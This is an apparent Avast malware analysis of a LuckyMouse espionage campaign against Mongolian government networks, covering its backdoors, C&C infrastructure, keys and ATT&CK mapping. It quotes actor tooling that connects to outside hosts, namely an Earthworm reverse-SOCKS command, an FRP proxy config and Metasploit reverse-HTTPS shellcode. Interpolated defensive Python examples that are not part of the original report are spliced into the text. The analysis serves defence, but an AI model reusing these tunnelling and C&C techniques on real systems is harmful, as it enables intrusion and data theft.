APT Group Targeting Governmental Agencies in East Asia
December 9, 2020
decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia

Introduction

This summer, Avast discovered a new APT campaign targeting government agencies and a National Data Center of Mongolia. Based on our research, we consider with moderate confidence that the Chinese-speaking APT group LuckyMouse is behind the attack.

The APT group planted backdoors and keyloggers to gain long-term access to government networks and then uploaded a variety of tools that they used to perform additional activities on the compromised network, such as scanning the local network and dumping credentials. We presume that the main aim of the cyber-espionage was the exfiltration of sensitive data from potentially interesting government agencies. According to our local telemetry, we consider that the government institutions were attacked in two ways. One was through a vulnerable company that provides services for these agencies, and the other was through spear-phishing emails with a malicious attachment, a weaponized document using CVE-2017-11882.

There are many tactics that are consistent with other reports of LuckyMouse; nevertheless, we are also seeing some previously undocumented tactics indicating that the actors have updated their toolset with the Polpo and LuckyBack backdoors. Our analysis below will highlight those new tactics.

Attribution & Clusterization

We base our presumption that this campaign was led by the LuckyMouse APT group on the tooling that we found during the investigation of this campaign, most of which has previously been attributed to LuckyMouse by other researchers [1][2][3]. In 2018, Kaspersky Labs released two blog posts about LuckyMouse targeting a national data center containing Asian government resources.
Their blog posts described several tool sets such as the network filtering driver NDISProxy, weaponized documents with CVE-2017-11882 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors), and the Earthworm tunneler. They also described a DLL sideloading technique abusing a legitimate application from Symantec (IntgStat.exe). This legitimate application loads a DLL named pcalocalresloader.dll. By sideloading their own version of pcalocalresloader.dll, the actors load the HyperBro RAT from a compressed and encrypted file, thumbs.db. While some of the tools used were publicly known tools available on the internet, the group also developed their own tools, including a rootkit [1][2].

In April 2019, Palo Alto Networks released a blog post about LuckyMouse. According to the post, the group installed webshells on a SharePoint server to compromise government organizations in the Middle East. Similarly, the group used several publicly known and available tools (such as mimikatz, curl, nbtscan). But what got our attention was the fact that the same HyperBro RAT was used in the campaign we were analyzing. The APT attack we analyzed also used a DLL sideloading technique, although with different executables. The executable used was a Symantec application, thinprobe.exe, that loads thinhostprobedll.dll. This DLL was then used to sideload thumb.db, which contained the encrypted and compressed HyperBro [3].

We've also discovered a Polpo backdoor in the network belonging to the National Data Center of Mongolia. This backdoor was accompanied by samples that are known to be used by the LuckyMouse group, which led us to the conclusion that this backdoor is a new addition to LuckyMouse's toolkit. We also observed more common tools, e.g. a VMProtect-obfuscated Earthworm tunneler, a custom installer dropping the NDISProxy network filtering driver, and various network scanners.
Infection Chain

We observed that this APT group was also targeting an unknown company that was providing services to government institutions in East Asia. The group infiltrated the company's computers and managed to harvest credentials belonging to the company's email accounts. Unfortunately, we haven't been able to identify which attack vector was used in this infiltration. These credentials were then used to send emails from the hacked company's email accounts to the government officials. While we were unable to recover the whole email, we've managed to recover the email's header. The header indicates that these emails were asking the recipient to update a firmware, i.e. to launch a self-extracting 7-zip archive attached to the email.

    Date: Sun, 28 Jun 2020 20:43:08 +0800 (ULAT)
    Subject: Re: Perform a firmware update on the server
    Attached file: XXXXXX_update.exe (sha256: 2D2EA3002C367684F21AD08BDC9B5079EBDEE08B6356AC5694EFA139D4C6E60D)

This archive drops three already familiar files: Symantec's thinprobe.exe, the malicious thinhostprobedll.dll, and thumb.db. The malicious DLL is used for DLL sideloading, decrypting and decompressing thumb.db and finally loading its processed content, a HyperBro RAT. This backdoor has also been reported on by Kaspersky [1] and Palo Alto Networks [3], the latter providing an extensive description of the HyperBro RAT.
Figure 1: Overview of infection vector

Toolset

In the following section we describe the tool set we found on the victim's PC, used by the APT group for cyber-espionage and lateral movement through the network. We could divide these tools into three categories:

- Helpers: ServiceInstaller, ShellCodeExecutor, DataExtractor 1/2, Information Collector
- Remote access: StartServiceTool, Korplug, LuckyBack, BlueTraveller, Polpo
- Publicly available tools: UAC bypass tool, port scanners, password dumpers, FRP, Earthworm tunneler

In detail, we found the following tools:

StartServiceTool

This tool installs wcm.dll into %WINDIR%\system32 and creates the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WindowsConnections Manager with the following values:

    Description: Makes automatic connect/disconnect decisions based on the network connectivity options currently available to the PC and enables management of network connectivity based on Group Policy settings.
    DisplayName: Windows Connections Manager
    ServiceDll: C:\Windows\system32\wcm.dll

This effectively creates a new service. The dropped binary is a 32-bit service DLL that has two parts: an embedded DLL, and mmLoader (http://tishion.github.io/mmLoader/), a loader that bypasses the Windows loader. The final payload DLL is written in Go and contains a single export named "Interface". This function expects four arguments consisting of two strings and their corresponding lengths. The string values specify the victim ID and the Dropbox API key to use. The API key is passed in as an RC4-encrypted and Base64-encoded value. The hardcoded decryption key is "0000111122223333". The DLL additionally contains a default API key which appears to be for the author's test account.
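An added analyst example (not code from the report or the actor) that recovers the "Interface" API-key argument, which the analysis above says is RC4-encrypted with "0000111122223333" and Base64-encoded, and that parses the "%currentDate% %currentTime%##%hostname%" upload body described next. The sample ciphertext is constructed here from a placeholder token and the beacon hostname is made up.

```python
"""Decode StartServiceTool's API-key argument and parse its Dropbox beacon body.

Added example, not code from the report. The RC4 key and the beacon layout
"%currentDate% %currentTime%##%hostname%" come from the analysis; the sample
ciphertext is built here from a placeholder, never from a real token.
"""
import base64
from typing import Tuple

RC4_KEY = b"0000111122223333"  # hard-coded key reported for the Interface export


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA then PRGA). Encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decode_api_key(blob: str, key: bytes = RC4_KEY) -> str:
    """Base64-decode then RC4-decrypt the argument handed to "Interface".

    A wrong key yields high-entropy bytes, so anything outside printable ASCII
    is rejected instead of being reported as a token."""
    plain = rc4(key, base64.b64decode(blob, validate=True))
    if not plain or any(b < 0x20 or b > 0x7E for b in plain):
        raise ValueError("not a printable token: wrong key or corrupted blob")
    return plain.decode("ascii")


def encode_api_key(token: str, key: bytes = RC4_KEY) -> str:
    """Inverse transform; used only to build the offline sample below."""
    return base64.b64encode(rc4(key, token.encode("ascii"))).decode("ascii")


def parse_beacon(body: str) -> Tuple[str, str]:
    """Split the upload body '%currentDate% %currentTime%##%hostname%' into
    (timestamp, hostname); raises ValueError if the '##' separator is absent."""
    stamp, sep, host = body.strip().partition("##")
    if not sep or not host:
        raise ValueError("body does not match the StartServiceTool beacon layout")
    return stamp, host


# Constructed sample: placeholder token, NOT a key recovered from the campaign.
SAMPLE_BLOB = encode_api_key("PLACEHOLDER_DROPBOX_TOKEN")
# Constructed beacon body with a made-up hostname.
SAMPLE_BEACON = "2020-06-28 20:43:08##WORKSTATION-EXAMPLE"

if __name__ == "__main__":
    print("token  :", decode_api_key(SAMPLE_BLOB))
    print("beacon :", parse_beacon(SAMPLE_BEACON))
```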
Initially, it tries to download a file from Dropbox via the HTTP API:

    POST /2/files/download HTTP/1.1
    Host: content.dropboxapi.com
    User-Agent: Go-http-client/1.1
    Content-Length: 0
    Authorization: Bearer [snipped]
    Dropbox-Api-Arg: {"path": "/infos/000000.txt"}
    Accept-Encoding: gzip

If the server responds with a file, it tries to upload a file with a timestamp and a hostname onto Dropbox:

    POST /2/files/upload HTTP/1.1
    Host: content.dropboxapi.com
    User-Agent: Go-http-client/1.1
    Content-Length: 36
    Authorization: Bearer [snipped]
    Content-Type: application/octet-stream
    Dropbox-Api-Arg: {"path": "/infos/116a0d.txt","mode": "overwrite","autorename": true,"mute": false,"strict_conflict": false}
    Accept-Encoding: gzip

    %currentDate% %currentTime%##%hostname%

Afterwards, a C&C request-response loop is started. Based on the response from the C&C server, one of the following commands is executed: download files, upload files, sleep, quit, or execute commands on a command line. See the following diagram for the detailed flow; keep in mind that all downloads and uploads use the aforementioned Dropbox API.

Figure 2: Overview of detailed execution flow

ServiceInstaller

We assume that this installer is intended to be executed by one of the aforementioned backdoors, as it requires command-line parameters for its successful execution:

    Switch  Argument
    -i      path of DLL to install as a service
    -u      uninstall a specific service name

At first, the security descriptors of both %windir%\system32\ and %windir%\system32\drivers\ are changed to allow the current user to copy files to these locations. Then the installer copies a service executable to %windir%\system32\ under a randomly generated name (4 alphanumeric characters).
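As an added hunting example (not tooling from the report), the following script checks service records for the persistence shapes described for StartServiceTool and ServiceInstaller: the WindowsConnections Manager key backed by system32\wcm.dll, and a DFS Replication or IAS Jet Database Access Service %number% service hosted from a four-character random DLL. The record layout, the constructed sample entries and the optional winreg collector are this example's own assumptions.

```python
"""Hunt for the svchost-hosted service DLLs dropped by StartServiceTool and
ServiceInstaller.

Added example, not tooling from the report. Only the service names and
ServiceDll patterns come from the analysis (WindowsConnections Manager with
system32\\wcm.dll; DFS Replication or "IAS Jet Database Access Service N"
with a 4-character random DLL). The record format and the optional Windows
registry collector are this example's own assumptions.
"""
import re
from typing import Iterable, List, Tuple

FAKE_WCM_KEY = "windowsconnections manager"            # StartServiceTool key (lower-cased)
WCM_DLL = re.compile(r"\\system32\\wcm\.dll$", re.I)    # StartServiceTool ServiceDll
IAS_JET_KEY = re.compile(r"^IAS Jet Database Access Service \d+$", re.I)
RANDOM4_DLL = re.compile(r"\\system32\\[a-z0-9]{4}\.dll$", re.I)

Record = Tuple[str, str]            # (service key name, ServiceDll value or "")
Finding = Tuple[str, str, List[str]]


def assess_service(name: str, service_dll: str) -> List[str]:
    """Return the reasons a service record matches the two installers.

    An empty list means no match. The legitimate Windows Connection Manager is
    the key Wcmsvc with wcmsvc.dll, and the real DFS Replication service is the
    key DFSR running DFSRs.exe via ImagePath rather than a ServiceDll, so both
    stay unflagged.
    """
    reasons = []
    if name.lower() == FAKE_WCM_KEY:
        reasons.append("key named like StartServiceTool's fake service")
    if WCM_DLL.search(service_dll):
        reasons.append("ServiceDll is system32\\wcm.dll")
    if IAS_JET_KEY.match(name):
        reasons.append("key matches ServiceInstaller's IAS Jet naming")
    if name.lower() == "dfs replication" and service_dll:
        reasons.append("'DFS Replication' hosted as a ServiceDll (real service is DFSR)")
    if reasons and RANDOM4_DLL.search(service_dll):
        reasons.append("ServiceDll is a 4-character name in system32")
    return reasons


def hunt(records: Iterable[Record]) -> List[Finding]:
    """Run assess_service over every (name, ServiceDll) pair and keep the hits."""
    findings = []
    for name, dll in records:
        reasons = assess_service(name, dll or "")
        if reasons:
            findings.append((name, dll, reasons))
    return findings


def collect_services_from_registry() -> List[Record]:
    """Windows-only collector (assumed helper): read every service key under
    HKLM\\SYSTEM\\CurrentControlSet\\Services and its Parameters\\ServiceDll.
    Returns [] where winreg is unavailable so the module still imports."""
    try:
        import winreg
    except ImportError:
        return []
    records = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                        r"SYSTEM\CurrentControlSet\Services") as root:
        index = 0
        while True:
            try:
                name = winreg.EnumKey(root, index)
            except OSError:           # no more subkeys
                break
            index += 1
            dll = ""
            try:
                with winreg.OpenKey(root, name + r"\Parameters") as params:
                    dll = str(winreg.QueryValueEx(params, "ServiceDll")[0])
            except OSError:           # no Parameters key or no ServiceDll value
                pass
            records.append((name, dll))
    return records


# Constructed sample records: two benign services beside the three patterns
# described in the report (the 4-character DLL names are made up).
SAMPLE_RECORDS: List[Record] = [
    ("Wcmsvc", r"%SystemRoot%\System32\wcmsvc.dll"),
    ("Dnscache", r"%SystemRoot%\System32\dnsrslvr.dll"),
    ("WindowsConnections Manager", r"C:\Windows\system32\wcm.dll"),
    ("DFS Replication", r"C:\Windows\system32\aB3x.dll"),
    ("IAS Jet Database Access Service 2", r"C:\Windows\system32\q9Zk.dll"),
]

if __name__ == "__main__":
    for name, dll, reasons in hunt(collect_services_from_registry() or SAMPLE_RECORDS):
        print(f"{name}: {dll}\n  - " + "\n  - ".join(reasons))
```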
Depending on whether a service named DFS Replication already exists in the netsvcs value of HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, a new service called DFS Replication (if it does not exist) or IAS Jet Database Access Service %number% is created. More specifically, its parameters are:

    Description: "Configures Internet Authentication Service (IAS). If this service is stopped, the remote network access that requires user authentication will be unavailable. If this service is disabled, any services that explicitly depend on it will fail to start or (Retail) Replicates files among multiple PCs keeping them in sync. On Client, it is used to roam folders between PCs; on the server, it is used to provide high availability and local access across a wide area network (WAN). If the service is stopped, file replication does not occur, and the files on the server become out-of-date. If the service is disabled, any services that explicitly depend on it will not start."
    DisplayName: DFS Replication / IAS Jet Database Access Service %number%
    ServiceDll: C:\Windows\system32\<4 random alphanumeric characters>.dll
    Tag: 0
    Security: 0

ShellCodeExecutor

This utility takes hex-encoded shellcode as an argument and then proceeds to execute it. The code responsible for decoding and unpacking can be seen below:

Figure 3: Decoding algorithm and executing decoded payload in allocated memory

While we weren't able to reconstruct at which stage this executor was used, we were able to recover its parameter, which corresponds to hex-encoded Metasploit-generated shellcode (the reverse HTTP proxy block, https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_https_proxy.asm) configured to connect to the URL oss.chrome-upgrade[.]com (202.59.9[.]58). We suspect that the threat actors used the shellcode just to retrieve and execute a further stage from the C&C server.

DataExtractor 1

This tool can be used to gather potentially sensitive documents with pdf, ppt, xls, and doc file extensions.
It recursively scans all connected drives for such documents that were modified in 2020 or later. Gathered documents are packed using WinRAR and the archive is protected with the password "zaq1xsw@cde3". This archive is then saved to C:\MSBuild\NVIDIA\ under the filename CRYPTO-%computerName%-%number_value%.SYS. This scan is repeated every 20 minutes. If this tool is launched a second time (e.g. after a reboot), only documents that were modified in the last 24 hours are gathered. After each run, the file %windir%\system32\igfxme.vbs is executed. Since this tool did not contain any exfiltration-related functionality, we presume that this script is used to exfiltrate the archive from the computer to a C&C. Unfortunately, we were not able to recover this script.

DataExtractor 2

This binary is a simple file scanner that is provided with a list of file extensions, a list of directories, and date boundaries as parameters. Every directory from the list is searched for files with a given file extension. If such files are found and their modification date is within the provided date boundaries (in UTC), their full paths are written to the output file. These paths are delimited by Windows line delimiters and encoded in 16-bit Unicode. Below is part of an error message that tells us how this utility is used:

    T040ClientLite.exe suffix .txt,.xls scanDirs E:\\test,E:\\test1 output E:\\test\\output.txt startEditDate 2020/04/26 endEditDate 2020/04/27

More generally, the command's format is:

    T040ClientLite.exe suffix <extensions> scanDirs <directories> output <file> startEditDate <date> endEditDate <date>

Information Collector

The Information Collector focuses on removable drives. If no such drives are connected, its execution is terminated.
The collector fingerprints those drives (serial number, vendor ID, product ID), encrypts this data with a 64-byte XOR key, and stores it on the system drive as hidden files. More specifically, it uses the following directories:

    C:\MSBuild\Resources\Format\S-1-1 (encrypted files)
    C:\MSBuild\Resources\Format\S-1-0\S-1-0-0 (unencrypted temporary files, deleted after encryption)

Figure 4: Sample enumerates drives, checking their type with GetDriveTypeA

It ensures its persistence by adding itself to the Run registry key (SOFTWARE\Microsoft\Windows\CurrentVersion\Run) under the value AvpSecurity. Interestingly, it contains many unused functions that invoke command-line tools such as systeminfo, arp, ipconfig, netstat, and tasklist. It also supports archiving the collected information using WinRAR with the hard-coded password "1qaz@WSX". The sample has no networking capabilities. It primarily serves for collecting the information and transferring it between machines in the network using removable drives. Moreover, the particular sample we analyzed contained a bug in the drive enumeration routine that made it virtually useless, as it hampered all of the sample's functionality.

RAT

Korplug (PlugX)

Korplug (PlugX) is a well-known Remote Access Trojan associated with Chinese-speaking attackers, and it has been used in a large number of targeted attacks since 2012 [4]. It uses DLL side-loading to load itself into memory through legitimate applications, which helps it stay unnoticed by security products. Korplug is a fully featured RAT, with capabilities such as file uploads, downloads, keystroke logging, webcam control and access to a remote cmd.exe shell.

In our case, we observed that it was loaded through an application provided by ESET called unsecapp.exe that was signed with a valid but expired certificate. After executing unsecapp.exe, it loads a malicious DLL, http_dll.dll.
This DLL, in turn, decrypts http_dll.dat with a custom algorithm, yielding Korplug, which is then loaded into memory and executed. Unfortunately, we were not able to trace the RAT back to the original payload that dropped and executed these files.

Addresses of C&C servers:

    web[.]microlynconline[.]com:80
    home[.]microlynconline[.]com:8000
    help[.]microlynconline[.]com:443
    host[.]microlynconline[.]com:53

Backdoors

We found three different backdoors in the government office network, two of which, Polpo and LuckyBack, were never seen in any previous campaign. Polpo also hit the National Data Center, while the two others, BlueTraveller and LuckyBack, only hit the government office network.

LuckyBack

LuckyBack first collects the computer's fingerprint and then tries to establish communication with the C&C server (45.77.55[.]145). Once the communication is established, the backdoor starts listening for commands. It is capable of: starting a remote shell, file manipulation (move, read, write, execute, get file size), keylogging, and screen capturing.

Technical details: At first, the code page in use is retrieved by calling chcp, a command providing the keyboard and character set information, on the system drive. The first request to the C&C server "registers" the device by providing its fingerprint. Namely, the fingerprint is constructed from: PID, Windows version/build number, CPU architecture, username, user privileges, hostname, IP address, code page, and RDP session ID. If the server accepts the registration, it responds with the PID and a simple string "OK". Afterwards, a simple request-response C&C loop is started; the commands and their corresponding numbers are listed in the table below:

    Command     Function
    0x70, 0x72  Receive data again
    0x1, 0x11   Create remote shell / quit remote shell
    0x2         File size and last write time of the specified file
    0x3         Read data from the specified file at the specified offset
    0x4         Get file size
    0x12        Delete the specified file
    0x13        Terminate a specific thread
    0x14        Receive reading configuration
    0x22        Execute %command% via the CreateProcess API
    0x23        Set the reading configuration for command 0x3
    0x24        Write data to the specified file
    0x32        File operations (move a file from one location to another)
    0x50        Start keylogging
    0x51        Stop keylogging
    0x60        Take screenshot

BlueTraveller

This backdoor is simpler in terms of commands than the previous one. It accepts just four commands: exit, upload, download, and execute on the command line. Nevertheless, it uses two layers of C&C servers: the first request goes to the first layer, and it yields the IP address of a C&C server from the second layer. Afterwards, the request-response C&C loop uses the second layer. If the backdoor receives a command for the command line, the output from the console is encrypted with AES-256 and sent back to the second-layer C&C server.

The binary itself has its strings encrypted with RC4, using the hardcoded key "L!Q@W#E$R%T^Y&U*A|}t~k". Among these strings, we find the address of the first-layer C&C server and the user agent that should be used for these requests. Our sample tried to contact http://go.vegispaceshop[.]org/shop.htm. The response seems pretty inconspicuous at first glance. But once we look more closely, we see that many lines are followed by a mixture of tabs and spaces, which is rather fishy indeed. And surprisingly, this is where the IP address of the second C&C layer hides!

Figure 5: Response from first layer of C&C server

Figure 6: Script which decrypts the white spaces from the HTML response

BlueTraveller uses the same scheme for encryption: AES-256 with a key derived from a string that is hashed with SHA-256, providing the IV and the key. The first usage of this encryption is in the first request to the second-layer C&C.
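As an added example (not the script from Figure 6), the following detector flags response lines whose trailing whitespace mixes tabs and spaces, the signal described above, and decodes them. Since the report does not give the actor's bit encoding, the tab = 1 / space = 0, one-character-per-line scheme used here is an assumption, and the sample page and the 203.0.113.10 address are constructed.

```python
"""Flag and decode trailing-whitespace payloads in an HTTP response body.

Added example, not the script from Figure 6. The report says only that lines
of the first-layer response end in a mixture of tabs and spaces that hides the
second-layer IP; the bit encoding used here (tab = 1, space = 0, one 8-bit
ASCII character per line, lines taken in order) is an ASSUMPTION made to
produce a runnable decoder, not the actor's real scheme.
"""
import ipaddress
import re
from typing import List, Optional, Tuple

TRAILING_WS = re.compile(r"[ \t]+$")


def find_trailing_whitespace_lines(body: str) -> List[Tuple[int, str]]:
    """Return (1-based line number, whitespace run) for each line whose trailing
    run contains BOTH tabs and spaces. Pure-space or pure-tab trailing runs are
    common in hand-written HTML; the mixture is the suspicious signal."""
    hits = []
    for lineno, line in enumerate(body.split("\n"), start=1):
        match = TRAILING_WS.search(line)
        if match and " " in match.group(0) and "\t" in match.group(0):
            hits.append((lineno, match.group(0)))
    return hits


def decode_trailing_whitespace(body: str) -> str:
    """Decode the flagged runs under the assumed encoding; returns "" as soon as
    a run is not 8 bits or a byte falls outside printable ASCII, so a false
    positive does not raise."""
    chars = []
    for _, run in find_trailing_whitespace_lines(body):
        bits = "".join("1" if ch == "\t" else "0" for ch in run)
        if len(bits) != 8:
            return ""
        value = int(bits, 2)
        if not 0x20 <= value < 0x7F:
            return ""
        chars.append(chr(value))
    return "".join(chars)


def extract_hidden_ipv4(body: str) -> Optional[str]:
    """Decode and accept the result only if it parses as an IPv4 address."""
    decoded = decode_trailing_whitespace(body)
    try:
        return str(ipaddress.IPv4Address(decoded))
    except (ipaddress.AddressValueError, ValueError):
        return None


def _hide_for_sample(text: str, lines: List[str]) -> str:
    """Build the constructed sample only: append one encoded character per line."""
    out = []
    for index, line in enumerate(lines):
        if index < len(text):
            line += "".join("\t" if bit == "1" else " "
                            for bit in format(ord(text[index]), "08b"))
        out.append(line)
    return "\n".join(out)


# Constructed sample: a benign-looking page carrying the documentation-range
# address 203.0.113.10 (a placeholder, not an indicator from the campaign).
SAMPLE_HTML = _hide_for_sample("203.0.113.10", [
    "<html>", "<head>", "<title>shop</title>", "</head>", "<body>",
    "<h1>Welcome</h1>", "<p>Our items</p>", "<ul>", "<li>one</li>",
    "<li>two</li>", "</ul>", "</body>", "</html>", "",
])

if __name__ == "__main__":
    for lineno, run in find_trailing_whitespace_lines(SAMPLE_HTML):
        print(f"line {lineno}: {run!r}")
    print("hidden address:", extract_hidden_ipv4(SAMPLE_HTML))
```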
For this first request, the key is derived from the string "0304276cf4f31345". The key is then used to encrypt the generated GUID and the computer's hostname, which are then Base64-encoded and used to generate the request URL: http:///home///. After this request is executed, commands are retrieved from: http:///index.htm. The obtained data is encrypted with AES-256, using the aforementioned approach with the GUID as the base string for the key-derivation procedure. Each response also contains the random number that was sent in the first second-layer request. The malware checks whether the received number matches the one it sent; in case of a mismatch, the command is discarded. If a command for the command line is received, the output of the executed command (AES-256 encrypted, using the same key as the previous response, and Base64 encoded) is sent to http:///help///.

Polpo

Polpo is a backdoor that we've been seeing in the wild since 2018. It supports around 15 different commands including information collection and exfiltration, file transfer, and proxy connections. Base64-encoded addresses of the C&C servers are hard-coded in the binary:

    Base64                     IP
    MjAzLjkxLjExOS40OjgwMDA=   203.91.119[.]4:8000
    MjAyLjE3OS4wLjE0Mjo4MDgw   202.179.0[.]142:8080
    MjAyLjE3OS41LjE2MTo0NDM=   202.179.5[.]161:443

Polpo – Communication

The backdoor mimics the HTTP protocol to blend in with normal traffic. The transferred data is encrypted with AES, encoded into Base64, and then sent as part of fake HTML content.

Figure 7: Command data parsing

The AES encryption key is derived from the first packet of each new command received from the C&C server, using the algorithm below:

Figure 8: Encryption key computation

The sample checks for a proxy configured on the system via the registry value Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable.
If a proxy is configured, it uses the server specified in Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer for all connections.

Polpo – Functionality

There are more than 15 commands supported by the backdoor, although some of them are duplicates. Most of the commands are executed in separate threads. Errors and inter-thread communication are handled using Events.

Figure 9: Command dispatcher

These commands are supported by the version of Polpo we've analyzed:

    Main command  Sub command  Function
    0x1FFFFFF                  Initialize CLI Interface
                  0x101FFFF    CLI: Spawn CMD.EXE
                  0x102FFFF    CLI: Write Data To File
                  0x103FFFF    CLI: List Directory
                  0x104FFFF    CLI: ShellExecuteW(0, "Open", Cmd, 0, 0)
                  0x106FFFF    CLI: Change Directory
                  0x107FFFF    CLI: Delete File
    0x2EEEEEE                  Commands
                  0x201EEEE    Enumerate Drives Info
                  0x202EEEE    Enumerate Files
                  0x203EEEE    Send File To C&C
                  0x204EEEE    Write Data To File
                  0x205EEEE    Run Default App
                  0x206EEEE    Shell Execute Open
                  0x207EEEE    Delete File
                  0x208EEEE    Delete Files Recursive
    0x3DD03DD                  Serve As Proxy (Hide As HTTP)
                  0x30103DD    Get Data To Transfer
    0x3DDDDDD                  Serve As Proxy (Raw Data)
    0x5FFFFFF                  Close Connection
    0x60AAAAAA                 Close Connection
    0x70BBBBBB                 Reboot
    0x80CCCCCC                 Shutdown System
    0xAFFFFFF                  Send File To C&C

UAC bypass tool

An open-source UAC bypass tool (https://github.com/vestjoe/WinPwnage, see its section on UAC bypass techniques) was detected on several compromised devices. It may be used to elevate privileges or achieve persistence on the system. We presume that it was used to execute tasks and programs under administrator-level permissions.

Port scanners

Several different port scanners were seen on compromised devices under various filenames. One of the port scanners used was the open-source https://github.com/kingron/s. We assume that in this case it was used for scanning the ports of the server to find out which services were running.
Nbtscan

Nbtscan is a command-line NetBIOS scanner for Windows that scans for open NetBIOS name servers in the network.

Password dumpers

Mimikatz (https://github.com/gentilkiwi/mimikatz) and LaZagne (https://github.com/AlessandroZ/LaZagne) were seen on the infected computers. We presume that they were used to retrieve credentials from the compromised computers. We've also spotted a wrapped Mimikatz version, downloaded from https://github.com/jas502n/mimikat_ssp, on several compromised devices.

FRP

Fast Reverse Proxy (FRP) is a tool that allows you to expose local services hidden behind NAT or a firewall to the internet. Both raw TCP and UDP are supported, as well as several other protocols whose requests can be forwarded to the internal services via this proxy. We've recovered a configuration file, 3bef4cd.tmp, for this proxy. Its content is the following:

    [common]
    server_addr = 202.59.9[.]58
    server_port = 8443
    privilege_token = %token%

    [SDJY_proxy]
    type = tcp
    remote_port = 6001
    plugin = socks5

It is immediately obvious that the actor used the SOCKS5 plugin to route requests to the compromised network via 202.59.9[.]58:8443.

Figure 10: Diagram of FRP tool usage

Earthworm tunneler

The Earthworm tunneler is considered to be a typical tool for Chinese-speaking actors by Kaspersky [1]. We've seen this tool on all compromised systems of the national data center. On one of these devices, we've managed to recover the command-line parameters that were used: -s rssocks -d 139.180.155.133 -e 80. The tool itself creates a SOCKS tunnel to the provided server. It is publicly available at http://rootkiter.com/EarthWorm/.

Conclusions

As this blog post demonstrates, LuckyMouse has used new methods to infiltrate the government institution through a third party's system, which they attacked first.
Avast has recently protected users in the government institution and national data center from further attacks using the samples we analyzed. We also discovered an interesting encryption method that delivers a hidden IP address in the whitespace of the C&C response. We presume that the attackers updated their attacking toolset in this campaign after it was discovered by Avast.

I would like to thank Adolf Středa, David Zimmer and Anh Ho for helping me with this research.

Indicators of Compromise (IoC)

Repository: https://github.com/avast/ioc/tree/master/LuckyMouse
List of SHA-256: https://github.com/avast/ioc/blob/master/LuckyMouse/samples.sha256

MITRE ATT&CK techniques

Initial Access
    T1199     | Trusted Relationship | Sending emails from hacked trusted email accounts
    T1566.001 | Spear Phishing Attachment | Emails with malicious documents and software updates

Execution
    T1059.003 | Windows Command Shell |
    T1204.002 | Malicious File |
    T1203     | Exploitation for Client Execution | Documents weaponized with CVE-2017-11882 (Equation Editor)
    T1106     | Native API | Windows API CreateProcessW

Persistence
    T1547.001 | Registry Run Keys | Using SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AvpSecurity
    T1543.003 | Create or Modify System Process: Windows Service | Multiple samples create services for persistence

Privilege Escalation
    T1548.002 | Bypass User Access Control | WinPwnage tool
    T1543.003 | Create or Modify System Process: Windows Service | Installs services in HKLM\SYSTEM\CurrentControlSet\Services\

Defense Evasion
    T1574.002 | Hijack Execution Flow: DLL Side-Loading | HyperBro was loaded, decrypted, decompressed and executed by a legitimate application using this technique
    T1564.001 | Hidden Files and Directories | Hiding collected information in hidden directories and files
    T1027     | Obfuscated Files or Information | Collected information is encrypted using a byte XOR operation
    T1218.011 | Rundll32 | Executing shellcode
    T1218     | Signed Binary Proxy Execution | thinprobe.exe (Symantec), unsecapp.exe (ESET)

Credential Access
    T1003.001 | LSASS Memory | Mimikatz
    T1552     | Unsecured Credentials | LaZagne

Discovery
    T1083     | File and Directory Discovery | Search for sensitive documents with extensions pdf, ppt, xls, doc
    T1046     | Network Service Scanning | Used publicly available tools nbtscan and the port scanner s
    T1120     | Peripheral Device Discovery | Searching for removable drives on the system
    T1082     | System Information Discovery |

Lateral Movement
    T1091     | Replication Through Removable Media | Information Collector is capable of copying binary files to removable drives

Collection
    T1560.001 | Archive Collected Data: Archive via Utility | Hides exfiltrated documents in password-protected .rar archives
    T1119     | Automated Collection |
    T1056.001 | Input Capture: Keylogging | Used in the LuckyBack backdoor

Command and Control
    T1071.001 | Application Layer Protocol: Web Protocols | Polpo: HTTP is used for communications with C2
    T1132.001 | Data Encoding: Standard Encoding | Polpo: encrypted data is encoded as Base64
    T1573.001 | Encrypted Channel: Symmetric Cryptography | Polpo: transferred data is encrypted with AES
    T1104     | Multi-Stage Channels | BlueTraveller: multiple C&C servers are used
    T1090.001 | Proxy: Internal Proxy | Polpo: serves as a proxy in the network

Exfiltration
    T1052.001 | Exfiltration Over Physical Medium: Exfiltration over USB | Information Collector moves files in the network over removable drives
    T1567.002 | Exfiltration Over Web Service: Exfiltration to Cloud Storage | StartServiceTool: Dropbox is used for exfiltration of collected data
    T1041     | Exfiltration Over C2 Channel | Polpo exfiltrates data to the C&C server

References

[1] https://securelist.com/luckymouse-hits-national-data-center/86083/
[2] https://securelist.com/luckymouse-ndisproxy-driver/87914/
[3] https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/
[4] https://www.welivesecurity.com/2014/11/12/korplug-military-targeted-attacks-afghanistan-tajikistan/